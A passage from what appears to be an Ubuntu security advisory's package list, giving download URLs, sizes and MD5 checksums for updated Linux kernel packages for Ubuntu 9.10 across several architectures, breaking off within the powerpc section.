  Size/MD5:  1447832 400eeba1e83569d777954b21b6df593c
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    43898 16b0a1310e3f70dccfc8d0d5f971b064
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   155186 b22b41e37f88fe49531f5580e0f7f712
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   172666 df244ff125096be469b1c56a30f1e05f
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:     8154 f2d765541e008431b4d3eae00f435b61

Updated packages for Ubuntu 9.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.dsc
  Size/MD5:     2450 610bb83247876f8a8b47a0fd0d46fae8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.tar.gz
  Size/MD5: 87052080 62b9dcb9ad24e659db1aa085f9e5a456
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.dsc
  Size/MD5:     1906 a39c7ff46fb3ff74480d0e98366a486d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.tar.gz
  Size/MD5: 81902928 c9e88b4f386710c3f22979986a7e3a34
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.dsc
  Size/MD5:     1943 25176b20de251c2e58bb95e2dd9c1c7b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.tar.gz
  Size/MD5: 82470873 4d5238d3d11105852133d3eb802a95cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.diff.gz
  Size/MD5:  2811600 b2b44f12a786758d470e6a29c09d0388
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.dsc
  Size/MD5:     3782 ae6bf5844769d00004b919a6f61d588c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-304.10_all.deb
  Size/MD5:  3790328 e35ab5c36ee1bac625d2a57bd19e0c5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-304.10_all.deb
  Size/MD5: 64258256 70b947cc9e9012c9472f2c317f11ffae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304_2.6.31-304.10_all.deb
  Size/MD5:  9662096 ac58cebef695901ea01bc7413b79109f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-19.56_all.deb
  Size/MD5:  3791668 3836f273873fedf9d2293ee0d11df6ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19_2.6.31-19.56_all.deb
  Size/MD5:  9531414 34d882276f33b0e37135c379a6e1c451
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-19.56_all.deb
  Size/MD5: 62161518 9d3f3f79b9f14db8bd3dc68594eb8c8c

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_amd64.deb
  Size/MD5:   603212 951db7e930eefc5fff9017c56badfb6e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_amd64.deb
  Size/MD5: 18660056 e39dda7f87b093e927c34a928b842c7a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   221398 682a7dab5b571a7b2fd31f19daf724c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    15536 55206db30b20aea4d7da38b342fc095d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    52128 1cde23d38ba6908e1123951ef4bc3c69
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    44828 94402e34a45cf232ae86f3cc08bf7f4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    50072 65e128949b6f525d9028187fe1e7cc37
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    92518 338960088cec6b9b25ef2a96e96f3ebc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    37776 452d9c073d191ec2be1cad3aceb34490
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   537676 6bb8167794701151c613afe28a5c62c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   130666 ff5cf8923b89d0fa4b5c3c4a61ef93f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    53846 ffdc544c68e862a0a3038c99ac2d73a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   310118 c2092f9a83a4f59145005f2c451d304b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:  4353666 3a04bb875ae70561075d05d5bb208977
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_amd64.deb
  Size/MD5:   694766 85017cb531a49ea743cb7b30341b5ffa
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-server_2.6.31-19.56_amd64.deb
  Size/MD5:   694938 550a64d6d54ee5f34f1fb9eefbd4cc3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_amd64.deb
  Size/MD5: 28924984 3001e6d36f6bf76621997bdbeb864234
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-server_2.6.31-19.56_amd64.deb
  Size/MD5: 28885946 ff6296f4c684dd9facb011fc51b0b6f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_amd64.deb
  Size/MD5: 11740736 287948976d92a7cae832a34ce33a99b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_amd64.deb
  Size/MD5:   743052 35cb9d5d80b77a2586d08ffb65d3212a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   168272 fc4758b6b91802971538d3a3c519056d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   202768 73cfe4be43d350582d171ff0e178b6b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    27268 ae850a5e0ba4381a290b8f21ff88737f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   311688 3dab8c023e4aad0df74c5193aeaca49b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:  2282064 f09b0e8828effab3770bfc1da159a8f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   158666 6765112bf6fed248c08465e47b4dab00
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   203112 fed91a4bc3d356a5a9bb1c6110337413
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   161072 faec6563ccef41e925482b36619fca7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    38056 505cbeb1fdbf55eea7664a19dcedc11f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:     5762 a3ba57f83594477b27886cb3f4bd1b0d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    73750 53978367ed22b3daba246878064b72c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    22240 8a1036af3dacffb432813cc8422f6ae8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:     9548 f1e71c2129cc33f1ff139401b7b81547
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    39844 48e4aa79753fdb3ce1877ca1817b9fc6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    23484 f1be46cb2947ebe6b6d2e5b571d71a35
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:  1389556 2ba51ea53e5454f75c8b39f21481e45d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    47382 89f1dff9282f3c667cf1b8c2bc41353c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    51636 41311bd8c8459ba04789539733e6ff5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   128972 9697c034ed2bb74b5d18c5ae31fe1af0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    15814 8f46e8ddd6cac16dbdbc7c89cc94bee0

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386.deb
  Size/MD5:   573528 fa913abed6caeb5c33eb2167f730956f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_i386.deb
  Size/MD5: 17943372 803487f6122441604ec3062e7bb98228
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   198832 3282a330510666a582f6b8c0269d2f53
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    32458 03e2d90ce28677b7956fa2a72726d02e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    49938 c0d1953d9212f1569f04e8c8ba0db7ca
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    42118 db5bcc80727cd1013bc8393df2a88e4c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    45954 2d497ad958e7e7fc1b57ce51ff6b3570
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    87386 8e3ab58cf14ac0e97a334a65ae3e42ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    33754 bdbf52c3d681cca0ecdced183d2d37c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   534176 5f166aa72d31a95df7cdb60abe4a0fc2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   128172 821c97524ce74e0685b135140c5261d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    49748 9423b0562b984b85856d219d7b67fa27
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   295726 0736ef03d01a5e5e4fdf284ad2be5409
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:  4185460 831a6068ef18d08ff697df14dead1668
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-386_2.6.31-19.56_i386.deb
  Size/MD5:   674832 6c28f2a428900b7c3ecd857dd2363150
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb
  Size/MD5:   674164 daade678beff67e96da61f42286bb8d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_i386.deb
  Size/MD5:   674252 0786c96b6d902a71c6f1a2e5aa202345
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-386_2.6.31-19.56_i386.deb
  Size/MD5: 28775482 99e9b99d437aa88ec42e838367ca0c3b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb
  Size/MD5: 28938194 19d1d147a9e9dfb49fcd30b9d065d289
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_i386.deb
  Size/MD5: 28836780 00047de0d649be8b91c813fe7ee482b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_i386.deb
  Size/MD5: 11193984 1848c77671f6d9129f990e1a0a9940d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_i386.deb
  Size/MD5:   743050 af6030dae8f05d7ef583ee7d6f31be8b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   172774 c11dd36baffeccf283ce48e122d7c791
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   186104 072e07c277b4f37611b21aad4390ccb0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    28372 82c8b14ef6982a48d3a8459d56ede43c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   292792 6c99c3b65ff7b159af94edf70358cb4a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:  2400232 94729dcb0c5adb15ded7b3302c4005eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   142004 9e43481b4e46409d8e711a628ce5e40a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   189566 83afe6de56cab613b4f890723a82a6b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   148522 b96767af921427e880579659ba7b757a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    35306 a6a1cbe7a75490632f24cad479916315
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:     6842 86b286685eabaf8b6d28d3f922249503
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    86058 c014cfa81ab99a01793d25b995c7d75f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    46424 d525bcf1a39f6a21f09d52d24e6a0eb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:     8916 f9efb7f192c3cc22c14df58803a64dfc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    36282 1d843fa9ef5beed8582f2924d0b53bcc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    21660 3ad0b4572c12885957a3b753fc3b9fe3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:  1495010 630f37fe420a74a22b4ca2eba4960999
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    44088 fddf56b0285ec3d0e6fc61e0fe8b86e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    48484 2614a20d6d57892a8789091eeeaa67b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   117810 ff004889bca11286287a59c36fa24c0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    14526 4c9cb3d5598c843bf5b90ddf0292d3c1

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   198810 76156647956f29c9e519aeac038c63bb
http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    32452 9a5dd5fe15dda0be28f7afd966e89af9
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    49936 31c4008b50016b2a6c3a90703f2becbb
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    42148 931518b24b123d3749719c35b2b23759
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    45950 297c686f52a35049b3b2c87a96aebf68
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    87366 ec3f16cc0aeeef91b8c887ff347b6b0a
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    33750 a29ddd339c071c5b948c96e30f36f650
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   534366 b15b19f3e6c581d22514700dbd6502d8
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   128202 3d0f559a80187074bb210e3dae3bbfa0
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    49732 41abb7e30f0bdac62c5cd064c4b0ac3e
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   295732 12e912ce1f15d580960e7956de0c4ae0
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:  4186814 7c18e86a3f5a5a985488ad67718887f9
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-lpia_2.6.31-19.56_lpia.deb
  Size/MD5:   674880 5dd2779cd5be613c330b7dc35410f271
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-lpia_2.6.31-19.56_lpia.deb
  Size/MD5: 28831528 8eaab1870eda62e8ee231e429c361455
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_lpia.deb
  Size/MD5:   742994 99d2d0609d9032e2810e19c92fc92834
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   172836 8b15eb5579853f45dc49055351df4225
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   186092 0eb0ceb5c23748d829f3e1d7977a35be
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    28366 0301ac544cf27b3dce660787d7575804
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   292736 16e84844c99e73b4e00419c38d78db3d
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:  2400366 43dda8f1a10775e382e7a328381265db
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   141998 930123e6b57798468d7085ae9f549150
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   189564 8d6e18aedb4b970a3643207b96589863
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   148506 78efdbf1323c68be564ad06205842cb6
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    35300 054cf95e7af87d6f744b69eb8166f275
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:     6828 5dbf32d40e88f471614e5cf286670e8f
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    86054 f24e7eaa3608985960e54a9048a24fb6
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    46410 80945eba79f53965effd546d23a8560b
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:     8906 e1c6021a615a4363dde2cf4a893fa53b
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    36270 eb2848e19ec2351b9102bc640e546991
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    21660 cfb271e26dfd127871f5d27547e0a7ba
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:  1494736 44113d529e3f4d3828f8719facd86370
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    44068 98817942a8188bd9281def20a1d327bb
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    48474 ebc9e58b5f98182006d6e3bb9c5ce179
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   117786 9b864dfc32d19a8cf2d61a68894835e9
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    14524 9ad51e3871197eb84b193bd9a3b29ec2

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   321488 509ad8549565d0d87fe246df5b26c7af
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   263628 b7028cc16ec749cc2fdd86e985c7bc6a
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    58850 3e2f18df29a75debc326e5919c9c13da
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    67040 8fdde64943d01e5c6a372424d3d24a03
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    45914 6a21bb6fc6dce2767be6f974ffdab524
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    51296 4c928d4f04bf96f5cdc5ccf7d3a60c81
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    90684 eac2ea55da023924723593afffbb5d2c
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   105146 c407a156a5e56f284fa682d87d2ed50e
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    39492 38f377d5a0bdbbbb642545aa6d7f641c
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    39270 47f890e2a1418595d92858350aa16475
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   580998 825045ff82a442eaf1a21a5448b0cefb
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   626388 b56b5416b642ba57471e6e125b99a32f
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   149292 930001a305b0f78060f3472fe46cde00
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   147332 ef6994c30f19462a7fc0cb7cd8f4dacc
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    79750 75c6da2308e05334f89f62917aee5b3d
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    84136 caf2a7e924b03340e579e9bdc0a7ba50
